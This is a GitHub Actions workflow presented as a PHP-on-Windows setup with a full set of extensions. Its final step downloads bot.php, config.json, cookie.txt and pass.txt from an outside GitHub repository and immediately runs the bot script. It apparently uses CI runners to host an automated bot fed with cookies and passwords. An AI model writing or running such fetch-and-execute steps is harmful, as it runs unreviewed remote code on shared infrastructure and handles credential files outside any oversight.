name: PHP on Windows (Full Extensions)

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  php-windows:
    runs-on: windows-latest

    steps:
      - name: Checkout Code
        uses: actions/checkout@v4

      - name: Setup PHP (Latest) with All Extensions
        uses: shivammathur/setup-php@v2
        with:
          php-version: 'latest'
          extensions: >
            bcmath, bz2, calendar, curl, exif, ffi, fileinfo, ftp, gd,
            gettext, gmp, iconv, intl, mbstring, mysqli, opcache, pcntl,
            pdo, pdo_mysql, pdo_pgsql, pdo_sqlite, pgsql, shmop, snmp,
            soap, sockets, sodium, sysvmsg, sysvsem, sysvshm, tidy, tokenizer,
            xml, xmlreader, xmlwriter, xsl, zip, zlib, openssl
          tools: composer
          coverage: none

      - name: Show PHP Version and Extensions
        run: |
          php -v
          php -m

      - name: Download 4 Files
        run: |
          Invoke-WebRequest -Uri https://github.com/kalepailmine001/botfiles/raw/refs/heads/main/bot.php -OutFile bot.php
          Invoke-WebRequest -Uri https://github.com/kalepailmine001/botfiles/raw/refs/heads/main/config.json -OutFile config.json
          Invoke-WebRequest -Uri https://github.com/kalepailmine001/botfiles/raw/refs/heads/main/cookie.txt -OutFile cookie.txt
          Invoke-WebRequest -Uri https://github.com/kalepailmine001/botfiles/raw/refs/heads/main/pass.txt -OutFile pass.txt
          php bot.php
          
